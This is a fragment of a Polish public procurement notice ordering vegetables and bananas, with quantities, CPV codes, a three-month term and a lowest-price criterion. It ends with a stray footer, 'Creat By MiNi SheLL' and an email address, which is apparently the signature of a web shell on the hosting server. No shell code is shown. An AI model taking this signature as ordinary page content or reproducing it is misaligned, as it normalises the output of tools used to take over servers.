14	Pietruszka natka[pęczek] szt: 40
15	Rzodkiewka ( pęczek) szt:50
16	Banan kg: 50
17	Por szt:	40
18	Seler  korzeń kg:150
19	Szczypiorek pęczek szt:40
20	Cebula kg: 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com